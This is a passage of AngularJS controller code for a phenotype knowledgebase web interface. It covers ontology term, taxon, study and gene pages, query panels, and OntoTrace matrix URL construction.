$window, Term, TaxaWithPhenotype, EntityPresence, EntityAbsence, EntityPhenotypeGenes, EntityExpressionGenes, OntologyTermSearch, Vocab, OMN, TaxonPhenotypesQuery, Label, APIroot) { $scope.termID = $routeParams.term; $scope.term = Term.query({'iri': $scope.termID}); $scope.tabs = { properties: {active: true}, taxa: {active: false}, genes: {active: false}, } $scope.taxaTabs = { phenotypes: {active: true}, presence: {active: false}, absence: {active: false} } $scope.genesTabs = { phenotypes: {active: true}, expression: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.activateTaxaTab = function (tabname) { if (_.has($scope.taxaTabs, tabname)) { $scope.taxaTabs[tabname].active = true; $location.search('taxatab', tabname); } } $scope.activateGenesTab = function (tabname) { if (_.has($scope.genesTabs, tabname)) { $scope.genesTabs[tabname].active = true; $location.search('genestab', tabname); } } // $scope.$on('$routeUpdate', function() { // $scope.activateTab($location.search().tab); // $scope.activateTaxaTab($location.search().taxatab); // $scope.activateGenesTab($location.search().genestab); // }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } if ($routeParams.taxatab && _.has($scope.taxaTabs, $routeParams.taxatab)) { $scope.taxaTabs[$routeParams.taxatab].active = true; } if ($routeParams.genestab && _.has($scope.genesTabs, $routeParams.genestab)) { $scope.genesTabs[$routeParams.genestab].active = true; } $scope.autocompleteTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.filters = { phenotypesTaxonFilter: null, phenotypesQualityFilter: null, phenotypesTaxaIncludeParts: false, phenotypesTaxaIncludeHomologs: false }; if ($routeParams['filters.phenotypesTaxonFilter']) { Label.query({'iri': $routeParams['filters.phenotypesTaxonFilter']}).$promise.then(function (response) { $scope.filters.phenotypesTaxonFilter = response; }); } if ($routeParams['filters.phenotypesQualityFilter']) { Label.query({'iri': $routeParams['filters.phenotypesQualityFilter']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['filters.phenotypesTaxaIncludeParts']) { $scope.filters.phenotypesTaxaIncludeParts = "true" === $routeParams['filters.phenotypesTaxaIncludeParts']; } if ($routeParams['filters.phenotypesTaxaIncludeHomologs']) { $scope.filters.phenotypesTaxaIncludeHomologs = "true" === $routeParams['filters.phenotypesTaxaIncludeHomologs']; } $scope.taxaWithPhenotypesPage = 1; $scope.taxaWithPhenotypesMaxSize = 3; $scope.taxaWithPhenotypesLimit = 20; $scope.taxaWithPhenotypesPageChanged = function (newPage) { $scope.taxaWithPhenotypesPage = newPage; var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, limit: $scope.taxaWithPhenotypesLimit, offset: ($scope.taxaWithPhenotypesPage - 1) * $scope.taxaWithPhenotypesLimit }; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypes = TaxaWithPhenotype.query(params); }; $scope.resetTaxaWithPhenotypes = function() { var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, total: true}; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypesTotal = TaxaWithPhenotype.query(params); $scope.taxaWithPhenotypesPageChanged(1); }; $scope.$watchGroup(['filters.phenotypesTaxonFilter', 'filters.phenotypesQualityFilter', 'filters.phenotypesTaxaIncludeParts', 'filters.phenotypesTaxaIncludeHomologs'], function (newValues, oldValues) { updateTaxaWithPhenotypeDownload(); $scope.resetTaxaWithPhenotypes(); }); $scope.$watch('filters.phenotypesTaxonFilter', function (value) { if ($scope.filters.phenotypesTaxonFilter) { $location.search('filters.phenotypesTaxonFilter', $scope.filters.phenotypesTaxonFilter['@id']); } else { $location.search('filters.phenotypesTaxonFilter', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('filters.phenotypesQualityFilter', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('filters.phenotypesQualityFilter', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeParts', function (value) { if ($scope.filters.phenotypesTaxaIncludeParts) { $location.search('filters.phenotypesTaxaIncludeParts', $scope.filters.phenotypesTaxaIncludeParts ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeParts', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeHomologs', function (value) { if ($scope.filters.phenotypesTaxaIncludeHomologs) { $location.search('filters.phenotypesTaxaIncludeHomologs', $scope.filters.phenotypesTaxaIncludeHomologs ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeHomologs', null); } }); function updateTaxaWithPhenotypeDownload() { var url = APIroot + "/taxon/with_phenotype?"; var urlParams = ["limit=0"]; urlParams.push("entity=" + $window.encodeURIComponent(OMN.angled($scope.termID))); if ($scope.filters.phenotypesQualityFilter) { urlParams.push("quality=" + $window.encodeURIComponent(OMN.angled($scope.filters.phenotypesQualityFilter['@id']))); } if ($scope.filters.phenotypesTaxonFilter) { urlParams.push("in_taxon=" + $window.encodeURIComponent($scope.filters.phenotypesTaxonFilter['@id'])); } if ($scope.filters.phenotypesTaxaIncludeParts) { urlParams.push("parts=" + $scope.filters.phenotypesTaxaIncludeParts) } if ($scope.filters.phenotypesTaxaIncludeHomologs) { urlParams.push("homologs=" + $scope.filters.phenotypesTaxaIncludeHomologs) } $scope.linkToTaxaWithPhenotypeDownload = url + urlParams.join("&"); } $scope.filters.presenceTaxonFilter = null; $scope.taxaWithPresencePage = 1; $scope.taxaWithPresenceMaxSize = 3; $scope.taxaWithPresenceLimit = 20; $scope.taxaWithPresencePageChanged = function (newPage) { $scope.taxaWithPresencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithPresenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithPresenceLimit}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresence = EntityPresence.query(params); }; $scope.resetTaxaWithPresence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresenceTotal = EntityPresence.query(params); $scope.taxaWithPresencePageChanged(1); }; $scope.$watch('filters.presenceTaxonFilter', function (value) { $scope.resetTaxaWithPresence(); }); $scope.taxaWithAbsencePage = 1; $scope.taxaWithAbsenceMaxSize = 3; $scope.taxaWithAbsenceLimit = 20; $scope.taxaWithAbsencePageChanged = function (newPage) { $scope.taxaWithAbsencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithAbsenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithAbsenceLimit}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsence = EntityAbsence.query(params); }; $scope.resetTaxaWithAbsence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsenceTotal = EntityAbsence.query(params); $scope.taxaWithAbsencePageChanged(1); }; $scope.$watch('filters.absenceTaxonFilter', function (value) { $scope.resetTaxaWithAbsence(); }); $scope.phenotypeGenesPage = 1; $scope.phenotypeGenesMaxSize = 3; $scope.phenotypeGenesLimit = 20; $scope.phenotypeGenesSettings = {}; $scope.phenotypeGenesSettings.includeParts = false; $scope.phenotypeGenesSettings.includeHomologs = false; $scope.phenotypeGenesPageChanged = function (newPage) { $scope.phenotypeGenesPage = newPage; $scope.phenotypeGenes = EntityPhenotypeGenes.query( { iri: $scope.termID, limit: $scope.phenotypeGenesLimit, offset: ($scope.phenotypeGenesPage - 1) * $scope.phenotypeGenesLimit, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); }; $scope.resetPhenotypeGenes = function() { $scope.phenotypeGenesTotal = EntityPhenotypeGenes.query( { iri: $scope.termID, total: true, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); $scope.phenotypeGenesPageChanged(1); }; $scope.expressionGenesPage = 1; $scope.expressionGenesMaxSize = 3; $scope.expressionGenesLimit = 20; $scope.expressionGenesPageChanged = function (newPage) { $scope.expressionGenesPage = newPage; $scope.expressionGenes = EntityExpressionGenes.query({iri: $scope.termID, limit: $scope.expressionGenesLimit, offset: ($scope.expressionGenesPage - 1) * $scope.expressionGenesLimit}); }; $scope.resetExpressionGenes = function() { $scope.expressionGenesTotal = EntityExpressionGenes.query({iri: $scope.termID, total: true}); $scope.expressionGenesPageChanged(1); }; $scope.resetTaxaWithPresence(); $scope.resetTaxaWithAbsence(); $scope.resetPhenotypeGenes(); $scope.resetExpressionGenes(); }) .controller('TaxonController', function ($scope, $routeParams, $location, $log, $window, Taxon, TaxonPhenotypesQuery, VariationProfileQuery, EntityPresenceEvidence, EntityAbsenceEvidence, OntologyTermSearch, OMN, Vocab, Label, APIroot) { $scope.taxonID = $routeParams.taxon; $scope.taxon = Taxon.query({'iri': $scope.taxonID}); $scope.filters = { phenotypesEntityFilter: null, phenotypesQualityFilter: null, quality_type: null, phenotypesEntityIncludeParts: false, phenotypesEntityIncludeHomologs: false }; if ($routeParams['phenotypes.entity']) { Label.query({'iri': $routeParams['phenotypes.entity']}).$promise.then(function (response) { $scope.filters.phenotypesEntityFilter = response; }); } if ($routeParams['phenotypes.quality_type']) { $scope.filters.quality_type = $routeParams['phenotypes.quality_type'] } else { $scope.filters.quality_type = "quality-phenotype"; } if ($routeParams['phenotypes.quality']) { Label.query({'iri': $routeParams['phenotypes.quality']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['phenotypes.entity_parts']) { $scope.filters.phenotypesEntityIncludeParts = "true" === $routeParams['phenotypes.entity_parts']; } if ($routeParams['phenotypes.entity_homologs']) { $scope.filters.phenotypesEntityIncludeHomologs = "true" === $routeParams['phenotypes.entity_homologs']; } $scope.autocompleteEntity = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.phenotypeProfilePage = 1; $scope.phenotypeProfileLimit = 20; $scope.phenotypeProfileMaxSize = 3; $scope.phenotypeProfilePageChanged = function (newPage) { $scope.phenotypeProfilePage = newPage; var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, limit: $scope.phenotypeProfileLimit, offset: ($scope.phenotypeProfilePage - 1) * $scope.phenotypeProfileLimit }; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfile = TaxonPhenotypesQuery.query(params); } else { var service = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; } else { service = EntityAbsenceEvidence; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfile = service.query(params); } else { $scope.phenotypeProfile = null; } } }; $scope.resetPhenotypeProfile = function () { var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, total: true}; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfileTotal = TaxonPhenotypesQuery.query(params); var url = APIroot + "/taxon/phenotypes?"; var urlParams = ["limit=0"]; urlParams.push("parts=" + params.parts); if (params.entity) { urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); } if (params.quality) { urlParams.push("quality=" + $window.encodeURIComponent(params.quality)); } urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { var service = null; var url = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; url = APIroot + "/entity/presence/evidence?"; } else { service = EntityAbsenceEvidence; url = APIroot + "/entity/absence/evidence?"; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfileTotal = service.query(params); var urlParams = ["limit=0"]; urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { $scope.phenotypeProfileTotal = null; $scope.linkToTaxonPhenotypeProfileDownload = null; } } $scope.phenotypeProfilePageChanged(1); } $scope.resetPhenotypeProfile(); $scope.$watchGroup(['filters.phenotypesEntityFilter', 'filters.phenotypesQualityFilter', 'filters.quality_type', 'filters.phenotypesEntityIncludeParts', 'filters.phenotypesEntityIncludeHomologs'], function (value) { $scope.resetPhenotypeProfile(); }); $scope.$watch('filters.phenotypesEntityFilter', function (value) { if ($scope.filters.phenotypesEntityFilter) { $location.search('phenotypes.entity', $scope.filters.phenotypesEntityFilter['@id']); } else { $location.search('phenotypes.entity', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('phenotypes.quality', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('phenotypes.quality', null); } }); $scope.$watch('filters.quality_type', function (value) { $location.search('phenotypes.quality_type', $scope.filters.quality_type); }); $scope.$watch('filters.phenotypesEntityIncludeParts', function (value) { $location.search('phenotypes.entity_parts', $scope.filters.phenotypesEntityIncludeParts ? "true" : "false"); }); $scope.$watch('filters.phenotypesEntityIncludeHomologs', function (value) { $location.search('phenotypes.entity_homologs', $scope.filters.phenotypesEntityIncludeHomologs ? "true" : "false"); }); $scope.variationProfilePage = 1; $scope.variationProfileLimit = 20; $scope.variationProfileMaxSize = 3; $scope.variationProfileTotal = VariationProfileQuery.query({taxon: $scope.taxonID, total: true}); $scope.variationProfilePageChanged = function (newPage) { $scope.variationProfilePage = newPage; $scope.variationProfile = VariationProfileQuery.query({taxon: $scope.taxonID, limit: $scope.variationProfileLimit, offset: ($scope.variationProfilePage - 1) * $scope.variationProfileLimit}); }; $scope.variationProfilePageChanged(1); $scope.tabs = { properties: {active: true}, phenotypes: {active: false}, variation: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('StudyController', function ($scope, $routeParams, $location, $log, $window, Study, StudyTaxa, StudyPhenotypes, Vocab, Label) { $scope.studyID = $routeParams.study; $scope.study = Study.query({'iri': $scope.studyID}); $scope.phenotypesPage = 1; $scope.phenotypesLimit = 20; $scope.phenotypesMaxSize = 3; $scope.phenotypesPageChanged = function (newPage) { $scope.phenotypesPage = newPage; var params = { iri: $scope.studyID, limit: $scope.phenotypesLimit, offset: ($scope.phenotypesPage - 1) * $scope.phenotypesLimit }; $scope.phenotypes = StudyPhenotypes.query(params); }; $scope.resetPhenotypes = function () { var params = {iri: $scope.studyID, total: true}; $scope.phenotypesTotal = StudyPhenotypes.query(params); $scope.phenotypesPageChanged(1); } $scope.resetPhenotypes(); $scope.taxaPage = 1; $scope.taxaLimit = 20; $scope.taxaMaxSize = 3; $scope.taxaPageChanged = function (newPage) { $scope.taxaPage = newPage; var params = { iri: $scope.studyID, limit: $scope.taxaLimit, offset: ($scope.taxaPage - 1) * $scope.taxaLimit }; $scope.taxa = StudyTaxa.query(params); }; $scope.resetTaxa = function () { var params = {iri: $scope.studyID, total: true}; $scope.taxaTotal = StudyTaxa.query(params); $scope.taxaPageChanged(1); } $scope.resetTaxa(); }) .controller('GeneController', function ($scope, $routeParams, $location, Gene, GenePhenotypes, GeneExpression) { $scope.geneID = $routeParams.gene; $scope.gene = Gene.query({iri: $scope.geneID}); $scope.queryPhenotypes = function () { $scope.phenotypes = GenePhenotypes.query({iri: $scope.geneID}); } $scope.queryExpression = function () { $scope.expression = GeneExpression.query({iri: $scope.geneID}); } $scope.queryPhenotypes(); $scope.queryExpression(); $scope.tabs = { phenotypes: {active: true}, expression: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('CharacterStateController', function ($scope, $routeParams, Label) { $scope.stateID = $routeParams.state; $scope.termLabel = Label.query({'iri': $scope.stateID}); }) .controller('ContentsController', function ($scope) { }) .controller('PresenceAbsenceController', function ($scope, EntityPresence) { $scope.presenceStates = []; $scope.queryPresence = function () { if ($scope.taxon && $scope.entity) { $scope.presenceStates = EntityPresence.query({'taxon': $scope.taxon, 'entity': $scope.entity}); } else { $scope.presenceStates = []; } }; }) .controller('QueryCharacterStatesController', function ($scope, CharacterStateQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryCharacterStates(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryCharacterStates = function () { $scope.statesResults = CharacterStateQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = CharacterStateQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryCharacterStates(); $scope.queryTotal(); } $scope.queryCharacterStates(); $scope.queryTotal(); }) .controller('QueryVariationProfileController', function ($scope, $routeParams, VariationProfileQuery, Vocab, OMN, Label) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: false }; // $scope.queryParams = { // taxa: [], // entities: [], // expressionEntities: [], // matchAllEntities: false, // }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryVariationProfile(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return item['@id']; }); if (taxa.length > 0) { result.taxon = angular.toJson(taxa); } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryVariationProfile = function () { $scope.profileResults = VariationProfileQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = VariationProfileQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryVariationProfile(); $scope.queryTotal(); } var urlQueryParams = { taxa: [], entities: [], matchAllEntities: false, }; var taxa = []; if ($routeParams.taxa) { var taxa = angular.fromJson($routeParams.taxa); } urlQueryParams.taxa = taxa.map(function (item) { return {'@id': item}; }); $scope.queryParams = urlQueryParams; $scope.queryVariationProfile(); $scope.queryTotal(); // if (angular.isDefined(taxa)) { // urlQueryParams.taxa = taxa.map(function (item) { // return Label.query({iri: item}); // }); // } // $q.all(urlQueryParams.taxa.map(function (item) { // return item.$promise; // })).then(function (data) { // $scope.queryParams = urlQueryParams; // $scope.queryVariationProfile(); // $scope.queryTotal(); // }); }) .controller('QueryTaxaController', function ($scope, TaxonQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true, includeExpressionEntity: false }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryTaxa(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryTaxa = function () { $scope.taxaResults = TaxonQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = TaxonQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryTaxa(); $scope.queryTotal(); } $scope.queryTaxa(); $scope.queryTotal(); }) .controller('QueryGenesController', function ($scope, GeneQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: false, includeEntity: true, includeExpressionEntity: false //not yet working on service side }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryGenes(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } var expressionEntities = queryParams.expressionEntities.map(function (item) { return OMN.angled(item['@id']); }); if (expressionEntities.length > 0) { if (queryParams.matchAllExpressionEntities) { result.expression_entity = OMN.intersection(expressionEntities); } else { result.expression_entity = OMN.union(expressionEntities); } } return result; } $scope.queryGenes = function () { $scope.genesResults = GeneQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = GeneQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryGenes(); $scope.queryTotal(); } $scope.queryGenes(); $scope.queryTotal(); }) .controller('OntoTraceController', function ($scope, OntologyTermSearch, $http, Vocab, $filter, APIroot) { $scope.ontotraceURL = null; $scope.inputType = 'simple'; $scope.ontotraceSettings = { includeParts: false, includeAllCharacters: false }; $scope.queryEntityExpression = null; $scope.queryTaxonExpression = null; $scope.$watch('queryEntityLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.entityExpressionErrorMessage = null; $scope.queryEntityExpression = response.data; }, function (error) { $scope.entityExpressionErrorMessage = error.data; $scope.queryEntityExpression = null; } ); } else { $scope.queryEntityExpression = null; } }); $scope.$watch('queryTaxonLabelExpression', function (value) { if (value) { $http.get(APIroot + '/term/resolve_label_expression', {params: {expression: value}}).then( function (response) { $scope.taxonExpressionErrorMessage = null; $scope.queryTaxonExpression = response.data; }, function (error) { $scope.taxonExpressionErrorMessage = error.data; $scope.queryTaxonExpression = null; } ); } else { $scope.queryTaxonExpression = null; } }); $scope.searchTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.searchEntities = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; function prepareTerm(term) { return $filter('encodeURI')($filter('angled')(term['@id'])); } $scope.$watchGroup(['queryEntity', 'queryTaxon', 'queryEntityExpression', 'queryTaxonExpression', 'inputType', 'ontotraceSettings.includeAllCharacters', 'ontotraceSettings.includeParts'], function (value) { if ($scope.inputType == 'simple' && $scope.queryEntity && $scope.queryTaxon) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + prepareTerm($scope.queryEntity) + "&taxon=" + prepareTerm($scope.queryTaxon) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=" + $scope.ontotraceSettings.includeParts; } else if ($scope.inputType == 'expression' && $scope.queryEntityExpression && $scope.queryTaxonExpression) { $scope.ontotraceURL = APIroot + "/ontotrace?entity=" + $filter('encodeURI')($scope.queryEntityExpression) + "&taxon=" + $filter('encodeURI')($scope.queryTaxonExpression) + "&variable_only=" + !$scope.ontotraceSettings.includeAllCharacters + "&parts=false"; } else { $scope.ontotraceURL = null; } }); }) .controller('SimilarityController', function ($scope, $routeParams, $q, $location, Gene, GeneSearch) { $scope.searchGenes = function (text) { return GeneSearch.query({ limit: 20, text: text }).$promise.then(function (response) { return response.results; }); }; $scope.$watch('geneToQuery', function (value) { if (_.has(value, '@id')) { $location.search('gene', value['@id']); } }); if ($routeParams.gene) { Gene.query({iri: $routeParams.gene}).$promise.then(function (value) { $scope.geneToQuery = value; }); } }) .controller('QueryPanelController', function ($scope, $location, Autocomplete, OMN, Vocab, Label, $q) { $scope.queryPages = [ {label: "Taxa", href: "/query_taxa", key: "taxa"}, {label: "Character states", href: "/query_characters", key: "character_states"}, {label: "Genes", href: "/query_genes", key: "genes"}, {label: "Variation profile", href: "/query_variation_profile", key: "variation_profile"} ]; $scope.queryTaxonValues = []; $scope.queryEntityValues = []; $scope.queryExpressionEntityValues = []; $scope.selectedPage = _.findWhere($scope.queryPages, {key: $scope.configuration}); function maybeGetLabel(term) { if (!term.label && !term.$promise) { return Label.query({iri: term['@id']}).$promise; } else { return $q.when(term); } } function mapParameters() { _.defaults($scope.parameters, {taxa: [], entities: [], expressionEntities: []}); $q.all($scope.parameters.taxa.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryTaxonValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryTaxonValues.push({term: item}); }); }); $q.all($scope.parameters.entities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryEntityValues.push({term: item}); }); }); $q.all($scope.parameters.expressionEntities.map(function (item) { return maybeGetLabel(item); })).then(function (items) { $scope.queryExpressionEntityValues.splice(0, $scope.queryTaxonValues.length); items.forEach(function (item) { $scope.queryExpressionEntityValues.push({term: item}); }); }); } function collectTerms(list) { var terms = list.filter(function (item) { return item.term; }).map(function (item) { return item.term; }); return terms; } $scope.queryParams = function () { var taxa = collectTerms($scope.queryTaxonValues); var entities = collectTerms($scope.queryEntityValues); var matchAllEntities; return { taxa: taxa, matchAllTaxa: false, entities: entities, matchAllEntities: $scope.parameters.matchAllEntities }; } $scope.searchTaxa = Autocomplete.taxa; $scope.searchEntities = Autocomplete.entities; $scope.applyQueryFilter = function () { $scope.queryDirty = false; $scope.applyQuery(); } var initiallyClean = true; $scope.$watch('queryParams() | json', function (value) { if (!initiallyClean) { $scope.queryDirty = true; } initiallyClean = false; $scope.parameters = _.extend($scope.parameters, $scope.queryParams()); }); $scope.$watch('selectedPage', function (value) { $location.path(value.href); }); $scope.$watch('parameters', function (value) { mapParameters(); }); $scope.queryDirty = false; mapParameters(); }) .controller('CommonGroupController', function ($scope, TaxonCommonGroup) { $scope.smallImage = function (iri) { if (iri) { var uuid = iri.replace("http://phylopic.org/image/", "").replace("/", ""); return "http://phylopic.org/assets/images/submissions/" + uuid + ".64.png"; } else { return ""; } }; $scope.group = TaxonCommonGroup.query({iri: $scope.taxon}); }) .controller('TaxonNameController', function ($scope, Taxon) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.taxonInfo = Taxon.query({iri: $scope.iri}); } }); $scope.isGenusOrSpecies = function (taxon) { if 